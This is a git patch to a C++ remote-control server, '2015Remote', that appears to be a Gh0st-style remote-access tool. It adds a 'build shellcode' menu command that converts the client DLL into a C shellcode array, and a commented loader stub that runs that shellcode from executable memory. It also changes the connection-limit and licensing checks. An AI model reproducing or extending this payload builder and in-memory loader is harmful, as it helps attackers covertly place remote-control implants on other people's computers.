From 4a91da0b682a9f68dc5fc9fdd7a305e943182b2e Mon Sep 17 00:00:00 2001
From: yuanyuanxiang <962914132@qq.com>
Date: Sat, 26 Jul 2025 04:28:02 +0800
Subject: [PATCH] Feature: Add a menu item to build shellcode

---
 server/2015Remote/2015Remote.rc     | Bin 90522 -> 90664 bytes
 server/2015Remote/2015RemoteDlg.cpp |  87 ++++++++++++++++++++++++++--
 server/2015Remote/2015RemoteDlg.h   |   1 +
 server/2015Remote/CPasswordDlg.cpp  |   4 +-
 server/2015Remote/resource.h        | Bin 44986 -> 45174 bytes
 5 files changed, 85 insertions(+), 7 deletions(-)

diff --git a/server/2015Remote/2015Remote.rc b/server/2015Remote/2015Remote.rc
index 0cd4d275835a936e4071dca4e0f8f2dcce984580..2195b29a52399cdc66618073a3c94e1377de1086 100644
GIT binary patch
delta 77
zcmbPrn03Vw)`l&NT-+i`48aT;45<t`K<Lbn&yWISPyX{(YkC7Wqrh|?9!3uSU<MBc
dR|X#-bY}2paGB1i%BVS+=Zn>L7jDL|FaQx`6C3~l

delta 21
dcmZ2+gmu<o)`l&NT-=j+zF2L)#LXBM1^{602rK{q

diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index 3b54f99..72d71fe 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -287,7 +287,7 @@ CMy2015RemoteDlg::CMy2015RemoteDlg(CWnd* pParent): CDialogEx(CMy2015RemoteDlg::I
 	std::strncpy(buf, s.c_str(), 16);
 	m_superID = std::strtoull(buf, NULL, 16);
 
-	m_nMaxConnection = 0;
+	m_nMaxConnection = 2;
 	m_hExit = CreateEvent(NULL, TRUE, FALSE, NULL);
 	m_hIcon = THIS_APP->LoadIcon(IDR_MAINFRAME);
 
@@ -417,6 +417,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
 	ON_COMMAND(ID_ONLINE_UNAUTHORIZE, &CMy2015RemoteDlg::OnOnlineUnauthorize)
 	ON_COMMAND(ID_TOOL_REQUEST_AUTH, &CMy2015RemoteDlg::OnToolRequestAuth)
 	ON_COMMAND(ID_TOOL_INPUT_PASSWORD, &CMy2015RemoteDlg::OnToolInputPassword)
+	ON_COMMAND(ID_TOOL_GEN_SHELLCODE, &CMy2015RemoteDlg::OnToolGenShellcode)
 END_MESSAGE_MAP()
 
 
@@ -655,7 +656,7 @@ LRESULT CMy2015RemoteDlg::OnShowMessage(WPARAM wParam, LPARAM lParam) {
 		uint32_t recvHigh = (uint32_t)lParam;
 		uint64_t restored = ((uint64_t)recvHigh << 32) | recvLow;
 		if (restored != m_superID)
-			exit(-1);
+			THIS_APP->UpdateMaxConnection(3+time(0)%5);
 	}
 	return S_OK;
 }
@@ -946,7 +947,7 @@ BOOL CMy2015RemoteDlg::OnInitDialog()
 	CreateSolidMenu();
 
 	std::string nPort = THIS_CFG.GetStr("settings", "ghost", "6543");
-	m_nMaxConnection = 1;
+	m_nMaxConnection = 2;
 	std::string pwd = THIS_CFG.GetStr("settings", "Password");
 	auto arr = StringToVector(pwd, '-', 6);
 	if (arr.size() == 7) {
@@ -1122,7 +1123,7 @@ LRESULT CMy2015RemoteDlg::OnPasswordCheck(WPARAM wParam, LPARAM lParam) {
 		dlg.DoModal();
 		if (hashSHA256(dlg.m_str.GetString()) != GetPwdHash()) {
 			KillTimer(TIMER_CHECK);
-			m_nMaxConnection = 1;
+			m_nMaxConnection = 2;
 			THIS_APP->UpdateMaxConnection(m_nMaxConnection);
 			int tm = THIS_CFG.GetInt("settings", "Notify", 10);
 			THIS_CFG.SetInt("settings", "Notify", tm - 1);
@@ -1556,7 +1557,7 @@ bool CMy2015RemoteDlg::CheckValid(int trail) {
 		if (dlg.m_sPassword != pwd)
 			THIS_CFG.SetStr(settings, pwdKey, dlg.m_sPassword.GetString());
 		
-		int maxConn = v.size() == 7 ? atoi(v[2].c_str()) : 1;
+		int maxConn = v.size() == 7 ? atoi(v[2].c_str()) : 2;
 		if (maxConn != m_nMaxConnection) {
 			m_nMaxConnection = maxConn;
 			THIS_APP->UpdateMaxConnection(m_nMaxConnection);
@@ -2918,3 +2919,79 @@ void CMy2015RemoteDlg::OnToolInputPassword()
 		}
 	}
 }
+
+// 将二进制数据以 C 数组格式写入文件
+bool WriteBinaryAsCArray(const char* filename, LPBYTE data, size_t length, const char* arrayName = "data") {
+	FILE* file = fopen(filename, "w");
+	if (!file) return false;
+
+	fprintf(file, "unsigned char %s[] = {\n", arrayName);
+	for (size_t i = 0; i < length; ++i) {
+		if (i % 24 == 0) fprintf(file, "    ");
+		fprintf(file, "0x%02X", data[i]);
+		if (i != length - 1) fprintf(file, ",");
+		if ((i + 1) % 24 == 0 || i == length - 1) fprintf(file, "\n");
+		else fprintf(file, " ");
+	}
+	fprintf(file, "};\n");
+	fprintf(file, "unsigned int %s_len = %zu;\n", arrayName, length);
+
+	fclose(file);
+	return true;
+}
+
+/* Example: <Select TinyRun.dll to build "tinyrun.c">
+#include "tinyrun.c"
+#include <windows.h>
+#include <stdio.h>
+
+int main() {
+	void* exec = VirtualAlloc(NULL,Shellcode_len,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
+	if (exec) {
+		memcpy(exec, Shellcode, Shellcode_len);
+		((void(*)())exec)();
+		Sleep(INFINITE);
+	}
+	return 0;
+}
+*/
+void CMy2015RemoteDlg::OnToolGenShellcode()
+{
+	CFileDialog fileDlg(TRUE, _T("dll"), "ServerDll.dll", OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT,
+		_T("DLL Files (*.dll)|*.dll|All Files (*.*)|*.*||"), AfxGetMainWnd());
+	int ret = 0;
+	try {
+		ret = fileDlg.DoModal();
+	}
+	catch (...) {
+		MessageBox("文件对话框未成功打开! 请稍后再试。", "提示", MB_ICONWARNING);
+		return;
+	}
+	if (ret == IDOK)
+	{
+		CString name = fileDlg.GetPathName();
+		CFile File;
+		BOOL r = File.Open(name, CFile::typeBinary | CFile::modeRead);
+		if (!r) {
+			MessageBox("文件打开失败! 请稍后再试。\r\n" + name, "提示", MB_ICONWARNING);
+			return;
+		}
+		int dwFileSize = File.GetLength();
+		LPBYTE szBuffer = new BYTE[dwFileSize];
+		File.Read(szBuffer, dwFileSize);
+		File.Close();
+
+		LPBYTE srcData = NULL;
+		int srcLen = 0;
+		if (MakeShellcode(srcData, srcLen, (LPBYTE)szBuffer, dwFileSize)) {
+			TCHAR buffer[MAX_PATH];
+			_tcscpy_s(buffer, name);
+			PathRemoveExtension(buffer);
+			if (WriteBinaryAsCArray(CString(buffer) + ".c", srcData, srcLen, "Shellcode")) {
+				MessageBox("Shellcode 生成成功! \r\n" + CString(buffer) + ".c", "提示", MB_ICONINFORMATION);
+			}
+		}
+		SAFE_DELETE_ARRAY(srcData);
+		SAFE_DELETE_ARRAY(szBuffer);
+	}
+}
diff --git a/server/2015Remote/2015RemoteDlg.h b/server/2015Remote/2015RemoteDlg.h
index dacd33f..e2a938e 100644
--- a/server/2015Remote/2015RemoteDlg.h
+++ b/server/2015Remote/2015RemoteDlg.h
@@ -267,4 +267,5 @@ public:
 	afx_msg LRESULT OnPasswordCheck(WPARAM wParam, LPARAM lParam);
 	afx_msg void OnToolInputPassword();
 	afx_msg LRESULT OnShowMessage(WPARAM wParam, LPARAM lParam);
+	afx_msg void OnToolGenShellcode();
 };
diff --git a/server/2015Remote/CPasswordDlg.cpp b/server/2015Remote/CPasswordDlg.cpp
index 9ea3716..291f64a 100644
--- a/server/2015Remote/CPasswordDlg.cpp
+++ b/server/2015Remote/CPasswordDlg.cpp
@@ -126,7 +126,7 @@ CPwdGenDlg::CPwdGenDlg(CWnd* pParent /*=nullptr*/)
 	, m_sUserPwd(_T(""))
 	, m_ExpireTm(COleDateTime::GetCurrentTime())
 	, m_StartTm(COleDateTime::GetCurrentTime())
-	, m_nHostNum(1)
+	, m_nHostNum(2)
 {
 
 }
@@ -153,7 +153,7 @@ void CPwdGenDlg::DoDataExchange(CDataExchange* pDX)
 	DDX_DateTimeCtrl(pDX, IDC_START_DATE, m_StartTm);
 	DDX_Control(pDX, IDC_EDIT_HOSTNUM, m_EditHostNum);
 	DDX_Text(pDX, IDC_EDIT_HOSTNUM, m_nHostNum);
-	DDV_MinMaxInt(pDX, m_nHostNum, 1, 10000);
+	DDV_MinMaxInt(pDX, m_nHostNum, 2, 10000);
 }
 
 
diff --git a/server/2015Remote/resource.h b/server/2015Remote/resource.h
index 6aabb768557fa57e48d42cfa8cbde4a30649b0de..29c02b71a15c0fddb177171aebbb87e50aeaf796 100644
GIT binary patch
delta 84
zcmdmWpXu8JrVU|hCr3$%OkTH!i_vVd<7&&v_tuF`b`WQq%(s?H)SbbV!H*%HA(+7f
o$npU~X9oYtjb+l4FRbQZG~XP!wwH0Tl7QIcfb}AiIo59i01ToWtN;K2

delta 22
gcmV+x0O|ks-~zhe0<c!Cvl6a|0h6w+7L%~A#)<d~-v9sr